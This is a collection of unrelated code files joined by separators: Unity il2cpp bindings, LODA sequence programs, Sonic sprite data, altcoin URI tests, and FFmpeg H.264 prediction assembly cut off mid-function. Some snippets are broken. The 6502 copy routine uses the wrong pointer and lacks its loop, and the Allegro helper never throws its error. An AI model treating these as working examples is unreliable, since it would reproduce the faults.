struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (HMUI::StackedController::*)(int, System::Action*, bool)>(&HMUI::StackedController::PopViewControllers)> {
static const MethodInfo* get() {
static auto* numberOfViewControllersToPop = &::il2cpp_utils::GetClassFromName("System", "Int32")->byval_arg;
static auto* finishedCallback = &::il2cpp_utils::GetClassFromName("System", "Action")->byval_arg;
static auto* immediately = &::il2cpp_utils::GetClassFromName("System", "Boolean")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "PopViewControllers", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{numberOfViewControllersToPop, finishedCallback, immediately});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::SetupViewControllerRect
// Il2CppName: SetupViewControllerRect
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (*)(HMUI::ViewController*, int)>(&HMUI::StackedController::SetupViewControllerRect)> {
static const MethodInfo* get() {
static auto* viewController = &::il2cpp_utils::GetClassFromName("HMUI", "ViewController")->byval_arg;
static auto* index = &::il2cpp_utils::GetClassFromName("System", "Int32")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "SetupViewControllerRect", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{viewController, index});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::New_ctor
// Il2CppName: .ctor
// Cannot get method pointer of value based method overload from template for constructor!
// Try using FindMethod instead!
// Writing MetadataGetter for method: HMUI::StackedController::LayoutViewControllers
// Il2CppName: LayoutViewControllers
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (HMUI::StackedController::*)(System::Collections::Generic::List_1<HMUI::ViewController*>*)>(&HMUI::StackedController::LayoutViewControllers)> {
static const MethodInfo* get() {
static auto* viewControllers = &::il2cpp_utils::MakeGeneric(::il2cpp_utils::GetClassFromName("System.Collections.Generic", "List`1"), ::std::vector<const Il2CppClass*>{::il2cpp_utils::GetClassFromName("HMUI", "ViewController")})->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "LayoutViewControllers", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{viewControllers});
}
};
|
; WAP to set (1) in the rightmost 4 bits of BX.
.MODEL TINY
.CODE
.STARTUP
MOV BX, 0H
OR BX, 0001H
.EXIT
END |
;-----------------------------------------------------------------------------
; Paul Wasson - 2021
;-----------------------------------------------------------------------------
; Zero page usage
sourcePtr0 := $5A
sourcePtr1 := $5B
destPtr0 := $5C
destPtr1 := $5D
stackPtr0 := $5E
stackPtr1 := $5F
;-----------------------------------------------------------------------------
; Copy - copy memory
;-----------------------------------------------------------------------------
; Inline parameters to specify source start and end and destination
; clobbers A,X,Y
;
; Example:
; jsr memory_copy
; .word source_start
; .word source_end
; .word dest_start
; <next instruction>
.proc memory_copy
; Pop return address to find parameters
pla
sta stackPtr0
pla
sta stackPtr1
; source_start
ldy #1
lda (destPtr0),y
sta sourcePtr0
iny
lda (destPtr0),y
sta sourcePtr1
; source_end
iny
lda (destPtr0),y
sta sourceEnd0
iny
lda (destPtr0),y
sta sourceEnd1
; dest
iny
lda (destPtr0),y
sta destPtr0
iny
lda (destPtr0),y
sta destPtr1
ldy #0
; *** copy loop here!
; calculate return address
lda stackPtr0
clc
adc #6 ; 6 bytes of parameters
tax ; save a copy
clc
lda stackPtr1
adc #0
pha
txa
pha
rts
.endproc ; print
|
; A054103: T(n,n-3), array T as in A054098.
; Submitted by Christian Krause
; 1,14,30,148,744,4610,32870,266972,2431608,24554194,272289630,3289836260,43017800312,605289111698,9119314568454,146474344313980,2498617856687400
mov $1,9
mov $3,$0
mov $4,4
lpb $3
add $1,$4
mul $2,-1
add $2,$1
div $1,2
add $4,2
mul $1,$4
sub $3,1
lpe
mov $0,$2
add $0,1
|
#include <axxegro/event/EventSource.hpp>
al::UserEventSource& al::GetUserEventSource(const ALLEGRO_EVENT& ev)
{
if(ev.type < 1024) {
std::runtime_error("GetUserEventSource called on non-user event");
}
return *(UserEventSource*)al_get_event_source_data(ev.any.source);
}
|
; A067324: Third column of triangle A067323.
; Submitted by Jon Maiga
; 2,7,23,76,255,869,3003,10504,37128,132430,476102,1723528,6277505,22988385,84592275,312636240,1159979700,4319218530,16134883410,60452176200,227110782990,855361970034,3228982640478
mov $3,2
mov $5,$0
lpb $3
mov $0,$5
sub $3,1
add $0,$3
mov $6,$0
mov $8,2
lpb $8
mov $0,$6
sub $8,1
add $0,$8
trn $0,1
seq $0,1453 ; Catalan numbers - 1.
mov $9,$8
mul $9,$0
add $7,$9
lpe
min $6,1
mul $6,$0
mov $0,$7
sub $0,$6
mov $2,$3
mul $2,$0
mov $0,$6
add $4,$2
lpe
min $5,1
mul $5,$0
mov $0,$4
sub $0,$5
sub $0,1
|
; ---------------------------------------------------------------------------
; Sprite mappings - rings
; ---------------------------------------------------------------------------
dc.w byte_9FA2-Map_obj25, byte_9FA8-Map_obj25
dc.w byte_9FAE-Map_obj25, byte_9FB4-Map_obj25
dc.w byte_9FBA-Map_obj25, byte_9FC0-Map_obj25
dc.w byte_9FC6-Map_obj25, byte_9FCC-Map_obj25
byte_9FA2: dc.b 1
dc.b $F8, 5, 0, 0, $F8
byte_9FA8: dc.b 1
dc.b $F8, 5, 0, 4, $F8
byte_9FAE: dc.b 1
dc.b $F8, 1, 0, 8, $FC
byte_9FB4: dc.b 1
dc.b $F8, 5, 8, 4, $F8
byte_9FBA: dc.b 1
dc.b $F8, 5, 0, $A, $F8
byte_9FC0: dc.b 1
dc.b $F8, 5, $18, $A, $F8
byte_9FC6: dc.b 1
dc.b $F8, 5, 8, $A, $F8
byte_9FCC: dc.b 1
dc.b $F8, 5, $10, $A, $F8
even |
#include "uritests.h"
#include "../guiutil.h"
#include "../walletmodel.h"
#include <QUrl>
void URITests::uriTests()
{
SendCoinsRecipient rv;
QUrl uri;
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?req-dontexist="));
QVERIFY(!GUIUtil::parseBitcoinURI(uri, &rv));
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?dontexist="));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
QVERIFY(rv.amount == 0);
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?label=Wikipedia Example Address"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString("Wikipedia Example Address"));
QVERIFY(rv.amount == 0);
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=0.001"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
QVERIFY(rv.amount == 100000);
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=1.001"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
QVERIFY(rv.amount == 100100000);
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=100&label=Wikipedia Example"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.amount == 10000000000LL);
QVERIFY(rv.label == QString("Wikipedia Example"));
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?message=Wikipedia Example Address"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
QVERIFY(GUIUtil::parseBitcoinURI("KazukiCoin://LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?message=Wikipedia Example Address", &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
// We currently don't implement the message parameter (ok, yea, we break spec...)
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?req-message=Wikipedia Example Address"));
QVERIFY(!GUIUtil::parseBitcoinURI(uri, &rv));
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=1,000&label=Wikipedia Example"));
QVERIFY(!GUIUtil::parseBitcoinURI(uri, &rv));
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=1,000.0&label=Wikipedia Example"));
QVERIFY(!GUIUtil::parseBitcoinURI(uri, &rv));
}
|
;*****************************************************************************
;* MMX/SSE2/AVX-optimized 10-bit H.264 intra prediction code
;*****************************************************************************
;* Copyright (C) 2005-2011 x264 project
;*
;* Authors: Daniel Kang <daniel.d.kang@gmail.com>
;*
;* This file is part of FFmpeg.
;*
;* FFmpeg is free software; you can redistribute it and/or
;* modify it under the terms of the GNU Lesser General Public
;* License as published by the Free Software Foundation; either
;* version 2.1 of the License, or (at your option) any later version.
;*
;* FFmpeg is distributed in the hope that it will be useful,
;* but WITHOUT ANY WARRANTY; without even the implied warranty of
;* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
;* Lesser General Public License for more details.
;*
;* You should have received a copy of the GNU Lesser General Public
;* License along with FFmpeg; if not, write to the Free Software
;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
;******************************************************************************
%include "libavutil/x86/x86util.asm"
SECTION_RODATA
cextern pw_512
cextern pw_16
cextern pw_8
cextern pw_4
cextern pw_2
cextern pw_1
pw_m32101234: dw -3, -2, -1, 0, 1, 2, 3, 4
pw_m3: times 8 dw -3
pw_pixel_max: times 8 dw ((1 << 10)-1)
pd_17: times 4 dd 17
pd_16: times 4 dd 16
SECTION .text
; dest, left, right, src
; output: %1 = (t[n-1] + t[n]*2 + t[n+1] + 2) >> 2
%macro PRED4x4_LOWPASS 4
paddw %2, %3
psrlw %2, 1
pavgw %1, %4, %2
%endmacro
;-----------------------------------------------------------------------------
; void ff_pred4x4_down_right(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED4x4_DR 0
cglobal pred4x4_down_right_10, 3, 3
sub r0, r2
lea r1, [r0+r2*2]
movhps m1, [r1-8]
movhps m2, [r0+r2*1-8]
movhps m4, [r0-8]
punpckhwd m2, m4
movq m3, [r0]
punpckhdq m1, m2
PALIGNR m3, m1, 10, m1
movhps m4, [r1+r2*1-8]
PALIGNR m0, m3, m4, 14, m4
movhps m4, [r1+r2*2-8]
PALIGNR m2, m0, m4, 14, m4
PRED4x4_LOWPASS m0, m2, m3, m0
movq [r1+r2*2], m0
psrldq m0, 2
movq [r1+r2*1], m0
psrldq m0, 2
movq [r0+r2*2], m0
psrldq m0, 2
movq [r0+r2*1], m0
RET
%endmacro
INIT_XMM sse2
PRED4x4_DR
INIT_XMM ssse3
PRED4x4_DR
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_DR
%endif
;------------------------------------------------------------------------------
; void ff_pred4x4_vertical_right(pixel *src, const pixel *topright, int stride)
;------------------------------------------------------------------------------
%macro PRED4x4_VR 0
cglobal pred4x4_vertical_right_10, 3, 3, 6
sub r0, r2
lea r1, [r0+r2*2]
movq m5, [r0] ; ........t3t2t1t0
movhps m1, [r0-8]
PALIGNR m0, m5, m1, 14, m1 ; ......t3t2t1t0lt
pavgw m5, m0
movhps m1, [r0+r2*1-8]
PALIGNR m0, m1, 14, m1 ; ....t3t2t1t0ltl0
movhps m2, [r0+r2*2-8]
PALIGNR m1, m0, m2, 14, m2 ; ..t3t2t1t0ltl0l1
movhps m3, [r1+r2*1-8]
PALIGNR m2, m1, m3, 14, m3 ; t3t2t1t0ltl0l1l2
PRED4x4_LOWPASS m1, m0, m2, m1
pslldq m0, m1, 12
psrldq m1, 4
movq [r0+r2*1], m5
movq [r0+r2*2], m1
PALIGNR m5, m0, 14, m2
pslldq m0, 2
movq [r1+r2*1], m5
PALIGNR m1, m0, 14, m0
movq [r1+r2*2], m1
RET
%endmacro
INIT_XMM sse2
PRED4x4_VR
INIT_XMM ssse3
PRED4x4_VR
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_VR
%endif
;-------------------------------------------------------------------------------
; void ff_pred4x4_horizontal_down(pixel *src, const pixel *topright, int stride)
;-------------------------------------------------------------------------------
%macro PRED4x4_HD 0
cglobal pred4x4_horizontal_down_10, 3, 3
sub r0, r2
lea r1, [r0+r2*2]
movq m0, [r0-8] ; lt ..
movhps m0, [r0]
pslldq m0, 2 ; t2 t1 t0 lt .. .. .. ..
movq m1, [r1+r2*2-8] ; l3
movq m3, [r1+r2*1-8]
punpcklwd m1, m3 ; l2 l3
movq m2, [r0+r2*2-8] ; l1
movq m3, [r0+r2*1-8]
punpcklwd m2, m3 ; l0 l1
punpckhdq m1, m2 ; l0 l1 l2 l3
punpckhqdq m1, m0 ; t2 t1 t0 lt l0 l1 l2 l3
psrldq m0, m1, 4 ; .. .. t2 t1 t0 lt l0 l1
psrldq m3, m1, 2 ; .. t2 t1 t0 lt l0 l1 l2
pavgw m5, m1, m3
PRED4x4_LOWPASS m3, m1, m0, m3
punpcklwd m5, m3
psrldq m3, 8
PALIGNR m3, m5, 12, m4
movq [r1+r2*2], m5
movhps [r0+r2*2], m5
psrldq m5, 4
movq [r1+r2*1], m5
movq [r0+r2*1], m3
RET
%endmacro
INIT_XMM sse2
PRED4x4_HD
INIT_XMM ssse3
PRED4x4_HD
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_HD
%endif
;-----------------------------------------------------------------------------
; void ff_pred4x4_dc(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
INIT_MMX mmxext
cglobal pred4x4_dc_10, 3, 3
sub r0, r2
lea r1, [r0+r2*2]
movq m2, [r0+r2*1-8]
paddw m2, [r0+r2*2-8]
paddw m2, [r1+r2*1-8]
paddw m2, [r1+r2*2-8]
psrlq m2, 48
movq m0, [r0]
HADDW m0, m1
paddw m0, [pw_4]
paddw m0, m2
psrlw m0, 3
SPLATW m0, m0, 0
movq [r0+r2*1], m0
movq [r0+r2*2], m0
movq [r1+r2*1], m0
movq [r1+r2*2], m0
RET
;-----------------------------------------------------------------------------
; void ff_pred4x4_down_left(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED4x4_DL 0
cglobal pred4x4_down_left_10, 3, 3
sub r0, r2
movq m0, [r0]
movhps m0, [r1]
psrldq m2, m0, 2
pslldq m3, m0, 2
pshufhw m2, m2, 10100100b
PRED4x4_LOWPASS m0, m3, m2, m0
lea r1, [r0+r2*2]
movhps [r1+r2*2], m0
psrldq m0, 2
movq [r0+r2*1], m0
psrldq m0, 2
movq [r0+r2*2], m0
psrldq m0, 2
movq [r1+r2*1], m0
RET
%endmacro
INIT_XMM sse2
PRED4x4_DL
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_DL
%endif
;-----------------------------------------------------------------------------
; void ff_pred4x4_vertical_left(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED4x4_VL 0
cglobal pred4x4_vertical_left_10, 3, 3
sub r0, r2
movu m1, [r0]
movhps m1, [r1]
psrldq m0, m1, 2
psrldq m2, m1, 4
pavgw m4, m0, m1
PRED4x4_LOWPASS m0, m1, m2, m0
lea r1, [r0+r2*2]
movq [r0+r2*1], m4
movq [r0+r2*2], m0
psrldq m4, 2
psrldq m0, 2
movq [r1+r2*1], m4
movq [r1+r2*2], m0
RET
%endmacro
INIT_XMM sse2
PRED4x4_VL
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_VL
%endif
;-----------------------------------------------------------------------------
; void ff_pred4x4_horizontal_up(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
INIT_MMX mmxext
cglobal pred4x4_horizontal_up_10, 3, 3
sub r0, r2
lea r1, [r0+r2*2]
movq m0, [r0+r2*1-8]
punpckhwd m0, [r0+r2*2-8]
movq m1, [r1+r2*1-8]
punpckhwd m1, [r1+r2*2-8]
punpckhdq m0, m1
pshufw m1, m1, 0xFF
movq [r1+r2*2], m1
movd [r1+r2*1+4], m1
pshufw m2, m0, 11111001b
movq m1, m2
pavgw m2, m0
pshufw m5, m0, 11111110b
PRED4x4_LOWPASS m1, m0, m5, m1
movq m6, m2
punpcklwd m6, m1
movq [r0+r2*1], m6
psrlq m2, 16
psrlq m1, 16
punpcklwd m2, m1
movq [r0+r2*2], m2
psrlq m2, 32
movd [r1+r2*1], m2
RET
;-----------------------------------------------------------------------------
; void ff_pred8x8_vertical(pixel *src, int stride)
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal pred8x8_vertical_10, 2, 2
sub r0, r1
mova m0, [r0]
%rep 3
mova [r0+r1*1], m0
mova [r0+r1*2], m0
lea r0, [r0+r1*2]
%endrep
mova [r0+r1*1], m0
mova [r0+r1*2], m0
RET
;-----------------------------------------------------------------------------
; void ff_pred8x8_horizontal(pixel *src, int stride)
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal pred8x8_horizontal_10, 2, 3
mov r2d, 4
.loop:
movq m0, [r0+r1*0-8]
movq m1, [r0+r1*1-8]
pshuflw m0, m0, 0xff
pshuflw m1, m1, 0xff
punpcklqdq m0, m0
punpcklqdq m1, m1
mova [r0+r1*0], m0
mova [r0+r1*1], m1
lea r0, [r0+r1*2]
dec r2d
jg .loop
REP_RET
;-----------------------------------------------------------------------------
; void ff_predict_8x8_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
%macro MOV8 2-3
; sort of a hack, but it works
%if mmsize==8
movq [%1+0], %2
movq [%1+8], %3
%else
movdqa [%1], %2
%endif
%endmacro
%macro PRED8x8_DC 1
cglobal pred8x8_dc_10, 2, 6
sub r0, r1
pxor m4, m4
movq m0, [r0+0]
movq m1, [r0+8]
%if mmsize==16
punpcklwd m0, m1
movhlps m1, m0
paddw m0, m1
%else
pshufw m2, m0, 00001110b
pshufw m3, m1, 00001110b
paddw m0, m2
paddw m1, m3
punpcklwd m0, m1
%endif
%1 m2, m0, 00001110b
paddw m0, m2
lea r5, [r1*3]
lea r4, [r0+r1*4]
movzx r2d, word [r0+r1*1-2]
movzx r3d, word [r0+r1*2-2]
add r2d, r3d
movzx r3d, word [r0+r5*1-2]
add r2d, r3d
movzx r3d, word [r4-2]
add r2d, r3d
movd m2, r2d ; s2
movzx r2d, word [r4+r1*1-2]
movzx r3d, word [r4+r1*2-2]
add r2d, r3d
movzx r3d, word [r4+r5*1-2]
add r2d, r3d
movzx r3d, word [r4+r1*4-2]
add r2d, r3d
movd m3, r2d ; s3
punpcklwd m2, m3
punpckldq m0, m2 ; s0, s1, s2, s3
%1 m3, m0, 11110110b ; s2, s1, s3, s3
%1 m0, m0, 01110100b ; s0, s1, s3, s1
paddw m0, m3
psrlw m0, 2
pavgw m0, m4 ; s0+s2, s1, s3, s1+s3
%if mmsize==16
punpcklwd m0, m0
pshufd m3, m0, 11111010b
punpckldq m0, m0
SWAP 0,1
%else
pshufw m1, m0, 0x00
pshufw m2, m0, 0x55
pshufw m3, m0, 0xaa
pshufw m4, m0, 0xff
%endif
MOV8 r0+r1*1, m1, m2
MOV8 r0+r1*2, m1, m2
MOV8 r0+r5*1, m1, m2
MOV8 r0+r1*4, m1, m2
MOV8 r4+r1*1, m3, m4
MOV8 r4+r1*2, m3, m4
MOV8 r4+r5*1, m3, m4
MOV8 r4+r1*4, m3, m4
RET
%endmacro
INIT_MMX mmxext
PRED8x8_DC pshufw
INIT_XMM sse2
PRED8x8_DC pshuflw
;-----------------------------------------------------------------------------
; void ff_pred8x8_top_dc(pixel *src, int stride)
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal pred8x8_top_dc_10, 2, 4
sub r0, r1
mova m0, [r0]
pshuflw m1, m0, 0x4e
pshufhw m1, m1, 0x4e
paddw m0, m1
pshuflw m1, m0, 0xb1
pshufhw m1, m1, 0xb1
paddw m0, m1
lea r2, [r1*3]
lea r3, [r0+r1*4]
paddw m0, [pw_2]
psrlw m0, 2
mova [r0+r1*1], m0
mova [r0+r1*2], m0
mova [r0+r2*1], m0
mova [r0+r1*4], m0
mova [r3+r1*1], m0
mova [r3+r1*2], m0
mova [r3+r2*1], m0
mova [r3+r1*4], m0
RET
;-----------------------------------------------------------------------------
; void ff_pred8x8_plane(pixel *src, int stride)
;-----------------------------------------------------------------------------
INIT_XMM sse2
cglobal pred8x8_plane_10, 2, 7, 7
sub r0, r1
lea r2, [r1*3]
lea r3, [r0+r1*4]
mova m2, [r0]
pmaddwd m2, [pw_m32101234]
HADDD m2, m1
movd m0, [r0-4]
psrld m0, 14
psubw m2, m0 ; H
movd m0, [r3+r1*4-4]
movd m1, [r0+12]
paddw m0, m1
psllw m0, 4 ; 16*(src[7*stride-1] + src[-stride+7])
movzx r4d, word [r3+r1*1-2] ; src[4*stride-1]
movzx r5d, word [r0+r2*1-2] ; src[2*stride-1]
sub r4d, r5d
movzx r6d, word [r3+r1*2-2] ; src[5*stride-1]
movzx r5d, word [r0+r1*2-2] ; src[1*stride-1]
sub r6d, r5d
lea r4d, [r4+r6*2]
movzx r5d, word [r3+r2*1-2] ; src[6*stride-1]
movzx r6d, word [r0+r1*1-2] ; src[0*stride-1]
sub r5d, r6d
lea r5d, [r5*3]
add r4d, r5d
movzx r6d, word [r3+r1*4-2] ; src[7*stride-1]
movzx r5d, word [r0+r1*0-2] ; src[ -stride-1]
sub r6d, r5d
lea r4d, [r4+r6*4]
movd m3, r4d ; V
punpckldq m2, m3
pmaddwd m2, [pd_17]
paddd m2, [pd_16]
psrad m2, 5 ; b, c
mova m3, [pw_pixel_max]
pxor m1, m1
SPLATW m0, m0, 1
SPLATW m4, m2, 2
SPLATW m2, m2, 0
pmullw m2, [pw_m32101234] ; b
pmullw m5, m4, [pw_m3] ; c
paddw m5, [pw_16]
mov r2d, 8
add r0, r1
.loop:
paddsw m6, m2, m5
paddsw m6, m0
psraw m6, 5
CLIPW m6, m1, m3
mova [r0], m6
paddw m5, m4
add r0, r1
dec r2d
jg .loop
REP_RET
;-----------------------------------------------------------------------------
; void ff_pred8x8l_128_dc(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_128_DC 0
cglobal pred8x8l_128_dc_10, 4, 4
mova m0, [pw_512] ; (1<<(BIT_DEPTH-1))
lea r1, [r3*3]
lea r2, [r0+r3*4]
MOV8 r0+r3*0, m0, m0
MOV8 r0+r3*1, m0, m0
MOV8 r0+r3*2, m0, m0
MOV8 r0+r1*1, m0, m0
MOV8 r2+r3*0, m0, m0
MOV8 r2+r3*1, m0, m0
MOV8 r2+r3*2, m0, m0
MOV8 r2+r1*1, m0, m0
RET
%endmacro
INIT_MMX mmxext
PRED8x8L_128_DC
INIT_XMM sse2
PRED8x8L_128_DC
;-----------------------------------------------------------------------------
; void ff_pred8x8l_top_dc(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_TOP_DC 0
cglobal pred8x8l_top_dc_10, 4, 4, 6
sub r0, r3
mova m0, [r0]
shr r1d, 14
shr r2d, 13
neg r1
pslldq m1, m0, 2
psrldq m2, m0, 2
pinsrw m1, [r0+r1], 0
pinsrw m2, [r0+r2+14], 7
lea r1, [r3*3]
lea r2, [r0+r3*4]
PRED4x4_LOWPASS m0, m2, m1, m0
HADDW m0, m1
paddw m0, [pw_4]
psrlw m0, 3
SPLATW m0, m0, 0
mova [r0+r3*1], m0
mova [r0+r3*2], m0
mova [r0+r1*1], m0
mova [r0+r3*4], m0
mova [r2+r3*1], m0
mova [r2+r3*2], m0
mova [r2+r1*1], m0
mova [r2+r3*4], m0
RET
%endmacro
INIT_XMM sse2
PRED8x8L_TOP_DC
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_TOP_DC
%endif
;-------------------------------------------------------------------------------
; void ff_pred8x8l_dc(pixel *src, int has_topleft, int has_topright, int stride)
;-------------------------------------------------------------------------------
;TODO: see if scalar is faster
%macro PRED8x8L_DC 0
cglobal pred8x8l_dc_10, 4, 6, 6
sub r0, r3
lea r4, [r0+r3*4]
lea r5, [r3*3]
mova m0, [r0+r3*2-16]
punpckhwd m0, [r0+r3*1-16]
mova m1, [r4+r3*0-16]
punpckhwd m1, [r0+r5*1-16]
punpckhdq m1, m0
mova m2, [r4+r3*2-16]
punpckhwd m2, [r4+r3*1-16]
mova m3, [r4+r3*4-16]
punpckhwd m3, [r4+r5*1-16]
punpckhdq m3, m2
punpckhqdq m3, m1
mova m0, [r0]
shr r1d, 14
shr r2d, 13
neg r1
pslldq m1, m0, 2
psrldq m2, m0, 2
pinsrw m1, [r0+r1], 0
pinsrw m2, [r0+r2+14], 7
not r1
and r1, r3
pslldq m4, m3, 2
psrldq m5, m3, 2
pshuflw m4, m4, 11100101b
pinsrw m5, [r0+r1-2], 7
PRED4x4_LOWPASS m3, m4, m5, m3
PRED4x4_LOWPASS m0, m2, m1, m0
paddw m0, m3
HADDW m0, m1
paddw m0, [pw_8]
psrlw m0, 4
SPLATW m0, m0
mova [r0+r3*1], m0
mova [r0+r3*2], m0
mova [r0+r5*1], m0
mova [r0+r3*4], m0
mova [r4+r3*1], m0
mova [r4+r3*2], m0
mova [r4+r5*1], m0
mova [r4+r3*4], m0
RET
%endmacro
INIT_XMM sse2
PRED8x8L_DC
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_DC
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_vertical(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_VERTICAL 0
cglobal pred8x8l_vertical_10, 4, 4, 6
sub r0, r3
mova m0, [r0]
shr r1d, 14
shr r2d, 13
neg r1
pslldq m1, m0, 2
psrldq m2, m0, 2
pinsrw m1, [r0+r1], 0
pinsrw m2, [r0+r2+14], 7
lea r1, [r3*3]
lea r2, [r0+r3*4]
PRED4x4_LOWPASS m0, m2, m1, m0
mova [r0+r3*1], m0
mova [r0+r3*2], m0
mova [r0+r1*1], m0
mova [r0+r3*4], m0
mova [r2+r3*1], m0
mova [r2+r3*2], m0
mova [r2+r1*1], m0
mova [r2+r3*4], m0
RET
%endmacro
INIT_XMM sse2
PRED8x8L_VERTICAL
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_VERTICAL
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_horizontal(uint8_t *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_HORIZONTAL 0
cglobal pred8x8l_horizontal_10, 4, 4, 5
mova m0, [r0-16]
shr r1d, 14
dec r1
and r1, r3
sub r1, r3
punpckhwd m0, [r0+r1-16]
mova m1, [r0+r3*2-16]
punpckhwd m1, [r0+r3*1-16]
lea r2, [r0+r3*4]
lea r1, [r3*3]
punpckhdq m1, m0
mova m2, [r2+r3*0-16]
punpckhwd m2, [r0+r1-16]
mova m3, [r2+r3*2-16]
punpckhwd m3, [r2+r3*1-16]
punpckhdq m3, m2
punpckhqdq m3, m1
PALIGNR m4, m3, [r2+r1-16], 14, m0
pslldq m0, m4, 2
pshuflw m0, m0, 11100101b
PRED4x4_LOWPASS m4, m3, m0, m4
punpckhwd m3, m4, m4
punpcklwd m4, m4
pshufd m0, m3, 0xff
pshufd m1, m3, 0xaa
pshufd m2, m3, 0x55
pshufd m3, m3, 0x00
mova [r0+r3*0], m0
mova [r0+r3*1], m1
mova [r0+r3*2], m2
mova [r0+r1*1], m3
pshufd m0, m4, 0xff
pshufd m1, m4, 0xaa
pshufd m2, m4, 0x55
pshufd m3, m4, 0x00
mova [r2+r3*0], m0
mova [r2+r3*1], m1
mova [r2+r3*2], m2
mova [r2+r1*1], m3
RET
%endmacro
INIT_XMM sse2
PRED8x8L_HORIZONTAL
INIT_XMM ssse3
PRED8x8L_HORIZONTAL
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED8x8L_HORIZONTAL
%endif
;-----------------------------------------------------------------------------
; void ff_pred8x8l_down_left(pixel *src, int has_topleft, int has_topright,
; int stride)
;-----------------------------------------------------------------------------
%macro PRED8x8L_DOWN_LEFT 0
cglobal pred8x8l_down_left_10, 4, 4, 7
sub r0, r3
mova m3, [r0]
shr r1d, 14
neg r1
shr r2d, 13
pslldq m1, m3, 2
psrldq m2, m3, 2
pinsrw m1, [r0+r1], 0
pinsrw m2, [r0+r2+14], 7
PRED4x4_LOWPASS m6, m2, m1, m3
jz .fix_tr ; flags from shr r2d
mova m1, [r0+16]
psrldq m5, m1, 2
PALIGNR m2, m1, m3, 14, m3
pshufhw m5, m5, 10100100b
PRED4x4_LOWPASS m1, m2, m5, m1
.do_topright:
lea r1, [r3*3]
psrldq m5, m1, 14
lea r2, [r0+r3*4]
PALIGNR m2, m1, m6, 2, m0
PALIGNR m3, m1, m6, 14, m0
